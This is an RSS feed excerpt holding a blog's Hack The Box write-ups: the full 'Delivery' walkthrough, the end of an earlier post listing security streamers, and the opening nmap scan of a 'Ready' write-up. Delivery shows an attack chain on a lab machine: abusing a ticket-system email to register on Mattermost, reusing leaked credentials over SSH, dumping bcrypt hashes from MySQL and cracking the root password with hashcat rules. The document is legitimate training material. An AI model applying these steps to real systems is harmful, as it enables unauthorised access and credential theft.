 does a lot of low level programming. His tool of choice is Rust and he has a lot of cool projects to show from writing an OS to a kernel exploit for an older version of Android. I won&amp;rsquo;t claim to understand everything he is doing but it&amp;rsquo;s very fun to hang around and I still manage to pick up bits and pieces. He posts many of his past streams on &lt;a href=&#34;https://www.youtube.com/channel/UC17ewSS9f2EnkCyMztCdoKA&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;YouTube&lt;/a&gt;
.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;PwnFunction&lt;/a&gt;
 has some really awesome dives explaining various web vulnerabilities, what causes them and how to exploit them. Recently he has also been working on a Binary Exploitation series.&lt;/p&gt;
&lt;p&gt;If you are looking for &lt;em&gt;even more&lt;/em&gt; cybersecurity content creators, check out this video -&amp;gt; &lt;a href=&#34;https://www.youtube.com/watch?v=GSraDuD4ziQ&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;https://www.youtube.com/watch?v=GSraDuD4ziQ&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;This box is probably one of my favorites simply because the foothold was so satisfying once I figured out and yet incredibly simple. I really appreciate IppSec taking the time to make this box and include the note about the inspiration. Hopefully, it was insightful for the rest of you as well.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB Delivery</title>
      <link>http://0xnightwolf.github.io/posts/delivery-writeup.md/</link>
      <pubDate>Sat, 22 May 2021 00:00:00 +0000</pubDate>
      
      <guid>http://0xnightwolf.github.io/posts/delivery-writeup.md/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In Delivery, we will leverage missconfigurations in a ticketing system and internal communications channels to gain access to where we certainly shouldn&amp;rsquo;t be able to go.  We will also see another example of where weak and reused passwords make our job easy.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;p&gt;Starting off with a standard NMAP scan and shows  both a SSH server on port 22 and a web server on port 80.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-12 15:22 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.222
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.15s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;2048&lt;/span&gt; 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;80/tcp open  http    nginx 1.14.2
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: nginx/1.14.2
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: Welcome
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 15.60 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Without any credentials to try for SSH, it makes the most since to tackle the web server first.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-homepage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There isn&amp;rsquo;t much new here but there are links to a few other useful pages. A Helpdesk link and a contact page in that tells about a few ways to get in contact with the team.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-contactus.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;If users have a &lt;code&gt;@delivery.htb&lt;/code&gt; email, sign up for an internal Mattermost server. Lacking that, unregistered users can open a ticket on a help desk platform.so we start by checking out the ticket system. The same one linked by from help desk on the home page.&lt;/p&gt;
&lt;h3 id=&#34;os-ticket&#34;&gt;OS Ticket&lt;/h3&gt;
&lt;p&gt;This leads to another subdomain. &lt;code&gt;http://helpdesk.delivery.htb/&lt;/code&gt;, which means &lt;code&gt;/et/hosts&lt;/code&gt; will need to be edited to make it reachable.&lt;/p&gt;
&lt;p&gt;A user account is not required prior to creating a ticket. It asks for standard information, name, email address, description of the problem, and so on.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketcreatepage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Doesn&amp;rsquo;t seem to be a whole lot here. We can pull up our ticket using the info on this page for editing and further communication and we also have an email that we could send replies too.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketopeneedpage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;From the ticket&amp;rsquo;s status page, we can see the info we submitted to open the ticket originally.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketmade.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;An attempt can be made  to register an account, but it requires email verification. As HTB boxes are not connected to the internet, there is never going to be a confirmation email.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-accontconfirmationrequired.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h3 id=&#34;foothold-mattermost-and-credential-reuse&#34;&gt;Foothold, Mattermost and Credential Reuse&lt;/h3&gt;
&lt;p&gt;The next thing to look at is the Mattermost instance.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostloginpage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There is a login page but no credentials so far. It&amp;rsquo;s possible to attempt to register but a  &lt;code&gt;@delivery.htb&lt;/code&gt; email account is required. A fake email could be submitted.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostsignuppage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;But&amp;hellip; email verification is also required for Mattermost. It might seem to be a dead end. However,  a user &lt;em&gt;can&lt;/em&gt; register a &lt;code&gt;@delivery.htb&lt;/code&gt; email account. It just takes a bit of creativity.&lt;/p&gt;
&lt;p&gt;Recall the ticket created on the OS Ticket platform, it provided an email that could be send replies to the ticket. Prehapes, it can be used as a valid &lt;code&gt;@deliery.htb&lt;/code&gt; email to register for the internal Mattermost server.&lt;/p&gt;
&lt;p&gt;Sure enough, the email given by the support ticket can receive email confirmation&amp;rsquo;s from Mattermost.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-verificationlinkiniticket.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Once the an account is verified it can be used to login to Mattermost.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-emailverified.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There are a few more steps in the account setup, including joining the Internal channel. Time to see what juicy secrets are being kept in their channels.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostinternalteam.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There are a few things to learn from this page. First, there are some credentials that can potentially be used to login elsewhere the OS Ticket platform and based on the conversation, they might work other places as well. &lt;code&gt;maildeliverer:Youve_G0t_Mail!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The above credentials can be used to access the Agent Sign in on OS Ticket. There might be other interesting info here but there doens&amp;rsquo;t seem to be much here in this case.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentlogin.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentpanel.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentlogin.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;However, the Mattermost channel also mentioned that password reuse was a problem. These credentials will likely work elsewhere.  Turns out one such place is, SSH.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-maildelivererssh.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root-password-cracking&#34;&gt;Root: Password Cracking&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;maildelivery&lt;/code&gt; doesn&amp;rsquo;t have any interesting groups or sudo rights. It might be able to access where Mattermost credentials are stored.  That would lead to some hashes we could likely crack.&lt;/p&gt;
&lt;p&gt;First thing to try is to check the Mattermost &lt;code&gt;config.json&lt;/code&gt; stored in &lt;code&gt;/opt/mattermost/config&lt;/code&gt; There the credentials Mattermost uses to interact with a local mysql database, &lt;code&gt;mmuser:Crack_The_MM_Admin_PW&lt;/code&gt;, are found.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostsqlsettings.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;These can be used to login into the local mysql instance.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mysqldbaccess.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Listing the databases shows there is one for Mattermost. Among the tables it contains, is one for users.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostdatabase.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Select the username and password fields and listing the contents to reveal the hash for the &amp;ldquo;root&amp;rdquo; user.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;MariaDB &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;mattermost&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;&amp;gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;select&lt;/span&gt; Username, password from Users;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Username                         | password                                                     |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| surveybot                        |                                                              |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| channelexport                    |                                                              |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| a9647633                         | $2a$10$NPohGjjgCpRgA6fyFTnKhO5Y4l5XZchc7ax5mcOplVPU/qN/KjQri |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;On the internal Mattermost channel, it was mentioned that &amp;ldquo;PleasSubcribe!&amp;rdquo; was probably used a lot and though it wasn&amp;rsquo;t in rockyou.txt the admin thought it could be cracked pretty trivially with some rules.&lt;/p&gt;
&lt;p&gt;Before it can be cracked, the hash type needs to be identified.  Hash identifier can typically get you on the right track with these and this one is predicted to be bcrypt.&lt;/p&gt;
&lt;p&gt;Rules are a way to create variations of Passwords without needing a larger password file. They can be things like adding &lt;code&gt;1234&lt;/code&gt; at the end of a password or exchanging &amp;ldquo;a&amp;rdquo; for &amp;ldquo;@&amp;rdquo;. Hashcat includes a number of rules configuration files and they can be a good starting point. Next a &amp;ldquo;wordlist&amp;rdquo; with the single the single password, &amp;ldquo;PleaseSubscribe!&amp;rdquo; is created.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-PowerShell&#34; data-lang=&#34;PowerShell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;.\hashcat64.exe -a 0 -m 3200 .\hashes_in.txt .\wordlist.txt -r .\rules\base64.rule
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-hashcatcracked.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;A result comes back pretty quickly.&lt;code&gt;root:PleaseSubscribe!21&lt;/code&gt; That can be used to login over SSH and gain full access over the machine.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-root.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;notetxt&#34;&gt;note.txt&lt;/h2&gt;
&lt;p&gt;IppSec left a note.txt providing some more context and inspiration behind the foothold on this box. I highly recommend giving it a read.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;root@Delivery:~# cat note.txt
I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I&amp;#39;ve seen several times.  The inspiration for the box is here:

- https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c

Keep on hacking! And please don&amp;#39;t forget to subscribe to all the security streamers out there.

- ippsec
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the spirit of the note, here are some cybersecurity streamers and YouTubers I would recommend checking out.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;IppSec&lt;/a&gt;
, the creator or this box, releases a video writeups for HTB boxes are they retire. They are very well put together and I would highly recommend checking them out for HTB or using &lt;a href=&#34;https://ippsec.rocks/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;his site&lt;/a&gt;
 to lookup specific tools or situations you might encounter.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;John Hammond&lt;/a&gt;
 posts video writeups for various CTFs and wargames. Awesome friendly guy and I totally recommend checking him out especially if you are looking to get started as a beginner.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;LiveOverflow&lt;/a&gt;
 makes videos on various CTF challenges and also dug into several other topics in some short series including, hardware security research, browser exploitation, Pwn Adventure 3 (a game designed for hacking) and a whole lot more.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;StackSmashing&lt;/a&gt;
 has done some really cool things in relation to hardware, reverse engineering, and hacking handheld game devices. There is also a few on reversing WannaCry and one about reversing and modifying an IoT Camera.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Gynvael&lt;/a&gt;
 streams regularly each week on various cyber security topics. One things about it is because it is a live stream, you get a chance to see raw work flow and methodology.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.twitch.tv/gamozo&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Gamozo Labs&lt;/a&gt;
 does a lot of low level programming. His tool of choice is Rust and he has a lot of cool projects to show from writing an OS to a kernel exploit for an older version of Android. I won&amp;rsquo;t claim to understand everything he is doing but it&amp;rsquo;s very fun to hang around and I still manage to pick up bits and pieces. He posts many of his past streams on &lt;a href=&#34;https://www.youtube.com/channel/UC17ewSS9f2EnkCyMztCdoKA&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;YouTube&lt;/a&gt;
.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;PwnFunction&lt;/a&gt;
 has some really awesome dives explaining various web vulnerabilities, what causes them and how to exploit them. Recently he has also been working on a Binary Exploitation series.&lt;/p&gt;
&lt;p&gt;If you are looking for &lt;em&gt;even more&lt;/em&gt; cybersecurity content creators, check out this video -&amp;gt; &lt;a href=&#34;https://www.youtube.com/watch?v=GSraDuD4ziQ&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;https://www.youtube.com/watch?v=GSraDuD4ziQ&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;This box is probably one of my favorites simply because the foothold was so satisfying once I figured out and yet incredibly simple. I really appreciate IppSec taking the time to make this box and include the note about the inspiration. Hopefully, it was insightful for the rest of you as well.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB Ready</title>
      <link>http://0xnightwolf.github.io/htb-writeups/ready-writeup.md/</link>
      <pubDate>Sat, 15 May 2021 00:00:00 -0600</pubDate>
      
      <guid>http://0xnightwolf.github.io/htb-writeups/ready-writeup.md/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Ready is a GitLab instance were we exploit an SSRF in order to get code execution and find ourselves in a docker container. We find some credentials to escalate to root inside the container and then leverage the fact it was started with the &amp;ldquo;privileged&amp;rdquo; flag to escape the container.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-27 00:15 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.129.90.66
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.095s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu &lt;span style=&#34;color:#ae81ff&#34;&gt;4&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;3072&lt;/span&gt; 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5080/tcp open  http    nginx
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| http-robots.txt: &lt;span style=&#34;color:#ae81ff&#34;&gt;53&lt;/span&gt; disallowed entries &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;15&lt;/span&gt; shown&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| / /autocomplete/users /search /api /admin /profile
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| /dashboard /projects/new /groups/new /groups/*/edit /users /help
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_/s/ /snippets/new /snippets/*/edit
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| http-title: Sign in &lt;span style=&#34;color:#ae81ff&#34;&gt;\x&lt;/span&gt;C2&lt;span style=&#34;color:#ae81ff&#34;&gt;\x&lt;/span&gt;B7 GitLab
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Requested resource was http://10.129.90.66:5080/users/sign_in
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-trane-info: Problem with XML parsing of /evox/about
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 20.31 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;NMAP shows that port 22 is open for SSH and there is a GitLab instance running a web server on port 5080. A sign in page is accessible that allows new accounts to be created.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-gitlabsignup.png&#34;
